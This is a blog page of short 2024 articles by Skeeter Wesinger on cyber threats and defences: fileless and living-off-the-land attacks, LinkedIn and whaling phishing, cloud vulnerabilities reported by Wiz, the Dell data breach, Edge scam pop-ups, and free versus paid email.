, , , ,

Did you get hacked?

A Large corporation with a well-funded cyber security team recently found out they’d been hacked! Their opponents used the combination of Living off the Land (LotL) techniques, fileless malware, legitimate credentials, and disguised communication makes these types of botnet activities incredibly difficult to detect, even for their expert tiger teams. Without the right focus on behavioral analysis, memory forensics, and network monitoring, even highly skilled teams could miss the subtle signs of this advanced form of attack.

If your teams are looking for traditional malware or malicious executables, they might not have focused on monitoring the activities of legitimate tools. Attackers are now using these tools can camouflage their actions to blend in with normal system administration tasks, so even if your tiger teams were monitoring system processes, the malicious use of these tools could easily go unnoticed.

One of the core advantages of LotL is the use of fileless techniques, which means that the attackers often don’t drop detectable malware on the system’s disk. Instead, they execute code directly in memory or utilize scripting environments like PowerShell. This method leaves behind little to no trace that traditional malware-detection tools or endpoint security would recognize.

The teams may have been conducting disk-based or signature-based analysis, which would be ineffective against fileless malware. Without leaving artifacts on the disk, the attackers bypass traditional endpoint detection, which would have been a major focus of the teams.
Since most of the activity occurs in memory, it would require deep memory forensics to uncover these types of attacks. If the tiger teams didn’t perform real-time memory analysis or use sophisticated memory forensics tools, they could miss the attack entirely.

Story By Skeeter Wesinger

September 19, 2024

/by
, ,

Flax Typhoon

U.S. authorities said on Wednesday that Flax Typhoon was used to infiltrate networks by exploiting known vulnerabilities and would then use existing system tools to perform filching.
The bots bypassed traditional security solutions like antivirus and intrusion detection systems because these systems were designed to detect known “malware signatures” or unusual file activity.

Therefore, the state-sponsored actor, in this case, the PRC, would avoid dropping large or sophisticated malware packages as these would increase the likelihood of triggering these defenses by relying on these stealth techniques of using legitimate system tools. They would minimize the use of any detectable malware. Therefore, attackers would avoid detection by the standard signature-based systems. After gaining initial access, the attackers dump user credentials from memory or password stores, allowing them to elevate privileges and move laterally across the network, accessing more sensitive systems and data.

Story By Skeeter Wesinger

September 19, 2024

/by
, ,

Phishing attacks on LinkedIn

Phishing attacks on LinkedIn are becoming increasingly sophisticated. State-sponsored actors are posing as recruiters from major headhunting firms like Korn Ferry, based in Los Angeles. These attackers aim to trick professionals into revealing sensitive information or downloading malware by creating profiles that closely resemble those of legitimate recruiters.

The process begins with attackers setting up fake LinkedIn profiles using stolen or fabricated information. A key red flag is the number of LinkedIn connections; if the profile has fewer than 10, it’s often a fake. These profiles frequently use company logos, professional headshots, and detailed job descriptions to appear credible. They may claim to represent well-known firms or major corporations like Google, Microsoft, or top-tier recruitment agencies to target professionals who aspire to work at such companies.

Once the profile is in place, the phishing attempt usually starts with a connection request or a direct message (InMail). The message will likely include a job offer or a unique career opportunity crafted to appeal to the recipient. The attacker might claim they’ve reviewed your profile and believe you are an excellent candidate for a prestigious, high-paying job—tactics often enhanced using AI to generate convincing content.

In the message, the fake recruiter may include a link, supposedly leading to a job portal, a document with more details, or a form to submit your CV. However, these links usually redirect to a malicious site designed to steal login credentials and personal information or install malware. Always hover over any links to inspect them before clicking. If the link looks suspicious, reconsider engaging.

Some of the most sophisticated attackers even create fake LinkedIn login pages or corporate websites to capture your username and password. It’s critical never to reuse passwords, as this could expose you to further attacks down the line. Additionally, they might request personal information such as your phone number, home address, or social security number under the pretense of a job application.

Remember, these attackers are not amateurs—they are state-sponsored actors. Be vigilant and cautious when interacting with unsolicited job offers on LinkedIn. Always verify the legitimacy of any recruiter before providing any information, and stay aware of the signs that an offer may be too good to be true.

 

Article by Skeeter Wesinger

September 16, 2024

 

 

https://www.linkedin.com/pulse/phishing-attacks-linkedin-skeeter-wesinger-5newe

/by
,

The Blue Whale

Of course, I am not using their real name, but the (Blue) Whale, also known as the Whale Group, is considered dangerous for several reasons, primarily due to its sophisticated methods, specific targets, and their alignment with geopolitical interests.
The Blue Whale is known for using highly targeted and convincing phishing campaigns. These attacks often involve well-researched and personalized emails that trick recipients into revealing sensitive information, such as login credentials. The group’s ability to craft sophisticated spear-phishing emails that appear legitimate makes detecting the threat challenging for even vigilant individuals.

The Blue Whale primarily focuses on high-profile targets, including political figures, military personnel, journalists, and researchers, particularly in Europe and Eastern Europe. These targets often involve sensitive areas like national security, policy-making, or international relations. The information stolen from such targets can be extremely valuable, and this information can even potentially be used to influence political events or even compromise national security.
The group’s primary motive appears to be espionage and intelligence gathering, which aligns with the interests of state-sponsored cyber espionage. The information collected by the Blue Whale could be used for a variety of purposes, including, but not limited to, undermining political opponents, influencing elections, or gaining a strategic advantage in international negotiations.
The Blue Whale has demonstrated high-level persistence in its operations. Often, the group returns to its targets repeatedly using remote connections until it is finally successful. The group is also extremely adaptive, constantly refining its tactics, techniques, and procedures (TTPs) to evade detection and improve the effectiveness of its attacks. This persistence and adaptability make it a formidable adversary and one not to be taken lightly.
In addition to phishing, the Blue Whale has been known to use advanced techniques, such as zero-day exploits (vulnerabilities that are currently unknown to the software vendor), to compromise systems. This level of sophistication indicates that the group has access to significant resources, potentially directly supplied by a nation-state sponsor.
Beyond espionage, the activities of groups like the Blue Whale have the potential to cause significant disruption. By compromising key individuals and institutions, they can disrupt governmental operations, undermine public trust, and create instability. In some cases, the stolen information could be leaked or manipulated to create political unrest or even to discredit public figures.
Overall, the (Blue) Whale’s combination of targeted attacks, sophistication of methods, and alignment with geopolitical interests make it one of the world’s most dangerous cyber-espionage groups. Their activities have the potential to cause significant harm at both the individual and state levels, making them a critical concern for cybersecurity professionals and national security agencies.

By Skeeter Wesinger August 18, 2024

/by

Whaling

Whaling is a specialized spear phishing that targets high-profile individuals within an organization, often called “Very big fish. These targets typically include senior executives, CEOs, CFOs, board members, or other key personnel with significant access to sensitive information, decision-making power, or financial resources. The termwhalingis derived from the idea that these individuals are thebig fishin the organizational hierarchy, making them particularly valuable targets for attackers.

Whaling

Whaling

Attackers carefully select their targets based on their roles and access within the organization. High-ranking executives are prime targets because they often have the authority to approve financial transactions, access confidential information, or initiate critical decisions without additional oversight.

Research and Reconnaissance:

Before launching an attack, cybercriminals conduct extensive research on their targets. They gather information from publicly available sources like LinkedIn, company websites, press releases, social media, and news articles. This information is used to craft personalized and convincing emails or messages that resonate with the target’s professional responsibilities and personal interests.

A whaling attack’s phishing email is highly customized and tailored to the specific target. It might appear to come from a trusted source, such as a colleague, a business partner, or even the company CEO, as these emails appear to be real. The email often contains urgent requests, such as approving a financial transaction, and often offers a clickable link for downloading an attachment or providing sensitive information.

An email that is similar to spear phishing but entices the recipient to call a phone number instead of clicking a link is called vishing (short for “voice phishing”).

In a vishing attack, the email may be crafted to appear as a legitimate communication from a trusted source, often urging the recipient to call a specific phone number. Once the recipient calls, they are typically connected to a scammer who attempts to extract sensitive information, such as passwords, credit card numbers, or other personal data, often under the guise of resolving an urgent issue or verifying account details.

Unlike generic phishing attacks, which might contain obvious red flags like poor grammar or suspicious links. However, whaling emails are usually very well-crafted, making them difficult to detect as fraudulent.

Once the target falls for the phishing attempt, the attacker can exploit the situation in various ways:

  • The attacker might trick the executive into authorizing a wire transfer to a fraudulent account.
  • The attacker could gain access to sensitive information, such as intellectual property, confidential business plans, or employee records.
  • The attacker may obtain login credentials that provide access to the company’s network, enabling further infiltration and data breaches.
  • The consequences of a successful whaling attack can be severe, including financial losses, legal repercussions, reputational damage, and the compromise of sensitive data. Because these attacks target the highest levels of an organization, they can have a cascading effect, leading to widespread disruption.

Whaling by Foreign Actors:

When whaling attacks are conducted by foreign actors, such as nation-state groups or state-sponsored hackers, the stakes are even higher. These attacks may be part of broader cyber-espionage campaigns aimed at stealing trade secrets, gaining intelligence, or disrupting the operations of a foreign company or government.

In this context, the term “whaling” still applies, but the focus shifts to the strategic objectives of the attackers, who may be working on behalf of a foreign government with geopolitical motives. These attacks are often more sophisticated, involving advanced techniques like social engineering, custom malware, and exploitation of zero-day vulnerabilities. Educating executives and key personnel about the risks of whaling and how to recognize phishing attempts is critical. Regular training sessions can help them spot suspicious emails and avoid falling victim.

Multi-Factor Authentication (MFA): Implementing MFA for accessing sensitive systems and approving financial transactions adds an extra layer of security, making it harder for attackers to exploit compromised credentials.

Email Filtering and Security Solutions: Advanced email security solutions can help detect and block phishing attempts by analyzing email content, links, and attachments for signs of fraud.

Incident Response Planning: Organizations should have a robust incident response plan to quickly respond to and mitigate the effects of a whaling attack, should one occur.

By Skeeter Wesinger August 14, 2024

 

/by

Cloud platforms pose significant security risks

Researchers at Wiz have uncovered several critical vulnerabilities across various cloud platforms, highlighting some significant security risks:

ExtraReplica: This vulnerability in Azure PostgreSQL allowed cross-account database access. By exploiting a misconfigured regular expression in the database’s SSL certificate validation, attackers could forge certificates to impersonate replication users and gain unauthorized access to databases.

AttachMe: Found in Oracle Cloud Infrastructure, this vulnerability enabled unauthorized users to attach storage volumes to their instances, providing them with full read/write access. Attackers could exploit this by knowing the volume’s OCID and ensuring their instance was in the same availability domain as the target volume.

NotLegit: This issue in Azure App Service exposed hundreds of source code repositories due to a configuration flaw. The vulnerability allowed public access to applications’ .git directories, leading to potential leaks of sensitive information and intellectual property.

ChaosDB: A significant flaw in Azure Cosmos DB, where integration with Jupyter Notebooks inadvertently exposed database keys. This allowed potential attackers to take over entire databases remotely.

SAPwned: Multiple vulnerabilities in SAP AI Core services, such as unauthenticated access to Helm servers and AWS tokens exposed by Grafana Loki, allowed attackers to access and manipulate customer data, posing risks of data breaches and supply chain attacks.

By Skeeter Wesinger July 23, 2024

/by

CrowdStrike Falcon Sensor can be a security vulnerability

Any client agent, including the CrowdStrike Falcon Sensor, could pose a security risk if not properly managed and secured.
Like any software, the Falcon Sensor could contain vulnerabilities that could compromise one or more endpoints if discovered and exploited by malicious actors. Regular updates and patches are essential to mitigate this risk of software vulnerabilities.
An improper agent configuration could leave the system exposed to threats. For example, if the sensor is not configured to monitor specific activities or enforce certain policies, it may fail to detect or prevent attacks.


Attackers who gain administrative access to the Falcon Sensor’s management console could turn off the sensor, alter its configurations, or manipulate its data. To prevent this insider threat, strict access controls and monitoring administrative activities are critical.
The Falcon Sensor requires certain privileges to perform its monitoring and protective functions. If an attacker misuses or escalates these privileges, it could lead to a broader system compromise, a privilege escalation.
The sensor collects extensive data about endpoint activities. If this data is not adequately protected, it could be accessed by unauthorized parties, leading to potential data breaches and privacy violations that people controlling the endpoint can see.
If the sensor produces false positives, legitimate activities might be blocked, disrupting business operations. Conversely, false negatives could allow threats to go undetected, compromising the endpoint.
The Falcon Sensor integrates with various other security systems and platforms. Weaknesses in these integrations, such as insecure APIs or communication channels, could be exploited to bypass the sensor’s protections.
The Falcon Sensor communicates with the CrowdStrike Falcon platform over the network. If these communications are not encrypted or adequately secured, attackers could intercept or tamper with them, creating exposure.
If the CrowdStrike software supply chain is compromised, attackers could introduce malicious code into the sensor before installing it on the endpoint. Ensuring the integrity and authenticity of software updates is vital to prevent this kind of attack.
By understanding and addressing these risks, organizations can significantly reduce the likelihood that the CrowdStrike Falcon Sensor can be a security vulnerability.

/by

Dell Data Breach

Dell Data Breach: A Modern Corporate Catastrophe

Dell Technologies, a titan in computing, recently found itself embroiled in a calamitous event: a massive data breach that affected approximately 49 million customers. The exposed information includes personal details such as names, addresses, and purchase histories.
Dell’s Initial Response: A HotWash
In a statement cloaked in corporate calmness, Dell Technologies asserted its commitment to the privacy and confidentiality of customer data. The company revealed an ongoing investigation into an incident involving a Dell portal, which harbored a database with certain types of customer information related to purchases. Dell downplayed the potential risk, emphasizing that the compromised data did not encompass financial or payment information, email addresses, telephone numbers, or any highly sensitive customer details.
The accessed data, according to Dell, was limited to:
  • Name
  • Physical address
  • Dell hardware and order information, including service tags, item descriptions, dates of orders, and related warranty information
A Divergent Narrative: The Hacker’s Claim
Contrasting Dell’s measured disclosures, a post on a hacker forum, as reported by the Daily Dark Web, painted a more sinister picture. The threat actor behind the post claimed to be selling data allegedly stolen from Dell’s systems in late April. The illicit advertisement boasted of “49 million customer records from Dell,” purportedly containing details of purchases made between 2017 and 2024.
Such a trove of information undeniably heightens the risk of targeted phishing attacks. Imposters, masquerading as Dell representatives, could exploit this data to deceive users into clicking malicious links, potentially leading to credential theft.
Dell’s Reassurances and Customer Guidance
Despite the grim scenario depicted by the hacker, Dell reassured its customers that no financial or payment information was included in the compromised database. The absence of email addresses and telephone numbers was also emphasized as a mitigating factor.
Dell advised its customers to remain vigilant and to report any suspicious activity related to their Dell accounts or purchases to their security team via email.
Conclusion: A Lingering Cloud of Uncertainty
The Dell data breach underscores the persistent vulnerabilities in the digital age, where even the most formidable corporations are not immune to cyber threats. While Dell’s reassurances may temper immediate fears, the long-term implications for customer trust and corporate reputation remain shrouded in uncertainty. As the investigation unfolds, Dell’s response and mitigation efforts will undoubtedly be scrutinized, serving as a cautionary tale in the annals of modern corporate history.
/by

Scam involving Microsoft Edge where users are tricked into believing they’ve been hacked

There is a known scam involving Microsoft Edge where users are tricked into believing they’ve been hacked. This scam often uses malicious pop-ups or notifications claiming that your computer is compromised, urging you to take immediate action. These alerts appear legitimate, but they are designed to deceive and potentially lead you to harmful sites or extract money from you. Clear your browser’s cache and cookies and run a full system scan with your antivirus software to address this. Avoid clicking on any suspicious links or calling any provided phone numbers.


The cure is to go into your settings, which are below (More Tools). It says (Settings) In the drop-down on the left side of the screen, you will find (Cookies and site permissions)
Under (Recent activity), Instead of deleting all of your cookies, go into the offending cookie and Block everything. If this needs to be clarified, call a good service person.

/by

Free Email Services vs Paid for Email Services

Free Email Services

Examples: Gmail, Yahoo Mail, Outlook.com

Advantages:

  1. Cost: They are free to use, which is the most significant advantage for many users.
  2. Accessibility: Easy to set up and use, often requiring just a few minutes to create an account.
  3. Basic Features: Offer essential email features, including sending and receiving emails, attachments, spam filtering, and security.
  4. Integration: Often integrates with other free services offered by the provider, such as cloud storage, calendars, and online document editing.

Disadvantages:

  1. Privacy Concerns: Free email providers use data mining to serve targeted advertisements. Your email content and personal data may be analyzed.
  2. Advertisements: Many free email services display ads within the email interface.
  3. Limited Support: Customer support is often limited and typically available through forums or help centers rather than direct contact.
  4. Storage Limits: Free accounts may come with limited storage space, requiring users to manage and delete emails regularly.
  5. Custom Domain: Free email services usually don’t allow using a custom domain (e.g., yourname@yourdomain.com), which can be less professional for business use.

Paid Email Services

Examples: Google Workspace (formerly G Suite), Microsoft 365, ProtonMail (paid tier), Zoho Mail

Advantages:

  1. Privacy and Security: Paid services often prioritize user privacy, providing better security measures and no ads. Some services offer end-to-end encryption.
  2. Custom Domain: Allows for custom domain email addresses, which are essential for businesses and professional use.
  3. Advanced Features: These include additional features like more storage space, advanced spam filtering, email aliases, and enhanced collaboration tools.
  4. Customer Support: Access to dedicated customer support, often including phone and email support.
  5. Integration: Seamless integration with other premium services and software offered by the provider, such as advanced cloud storage, team collaboration tools, and enterprise-grade applications.

Disadvantages:

  1. Cost: Requires a monthly or annual subscription fee, which can vary based on the service level and number of users.
  2. Setup Complexity: This may require a more complex setup, especially for custom domain email addresses requiring technical knowledge or professional assistance.
  3. Overhead: Businesses must manage the subscriptions and renewals, adding to administrative overhead.

Security Drawbacks of Free Services like Google (Gmail)

  1. Data Mining and Privacy:
    • Email Scanning: Google scans emails for targeted advertising and data analytics. While this is primarily for ad targeting, it raises data privacy and security concerns.
    • Third-Party Access: Although Google has robust security measures, there have been concerns about third-party apps and services accessing user data through permissions granted by the user.
  2. Advertising Model:
    • Targeted Ads: The presence of targeted ads based on email content can feel invasive and raise concerns about how securely data is being handled.
  3. Basic Security Features:
    • Encryption: Gmail offers encryption in transit (TLS), but emails are not end-to-end encrypted by default. This means Google can access email content.
    • Standard Protection: While Gmail includes standard security measures like spam filtering and phishing protection, more might be needed for businesses with high-security needs.
  4. Support and Incident Response:
    • Limited Direct Support: Free services offer limited direct support in the case of a security breach or urgent security issue. Users might have to rely on forums and help centers, which can delay resolution.
    • Response Time: Security incidents might not be addressed promptly, as with paid services offering dedicated support.

Security Advantages of Paid Services like Network Solutions

  1. Enhanced Privacy:
    • No Data Mining for Ads: Paid services like Network Solutions do not rely on advertising revenue, so they don’t scan emails for ad targeting. This ensures greater privacy and security for your data.
    • Data Ownership: Users typically retain full ownership and control of their data, not used for any purpose other than the service provided.
  2. Advanced Security Features:
    • End-to-end Encryption: Many paid email services offer end-to-end encryption, ensuring that only the sender and recipient can read the email content.
    • Advanced Spam and Phishing Protection: Enhanced spam filters, phishing protection, and malware detection are standard in paid services, reducing the risk of security breaches.
  3. Custom Security Configurations:
    • Customizable Security Settings: Paid services allow for more granular control over security settings, enabling businesses to tailor security protocols to their specific needs.
    • Two-Factor Authentication (2FA): While free services offer 2FA, paid services often provide more robust and customizable authentication options, including multi-factor authentication (MFA).
  4. Dedicated Support and Incident Response:
    • Priority Support: Paid services typically offer 24/7 customer support with dedicated security experts who can quickly address and resolve security issues.
    • Incident Response: Faster response times and professional incident response teams are available to handle security breaches, ensuring minimal disruption.
  5. Compliance and Legal Protections:
    • Regulatory Compliance: Paid services often provide features and support to ensure compliance with various regulations such as GDPR, HIPAA, etc. This is crucial for businesses handling sensitive or regulated data.
    • Audit and Monitoring: Enhanced monitoring and auditing tools are available to track and respond to suspicious activities.

Summary

The choice is yours and depends on your specific needs. Free email services are suitable for personal use, casual communication, and users who don’t require advanced features or high levels of privacy. Paid email services are ideal for businesses, professionals, and users who prioritize privacy, custom domain usage, advanced features, and robust customer support.

/by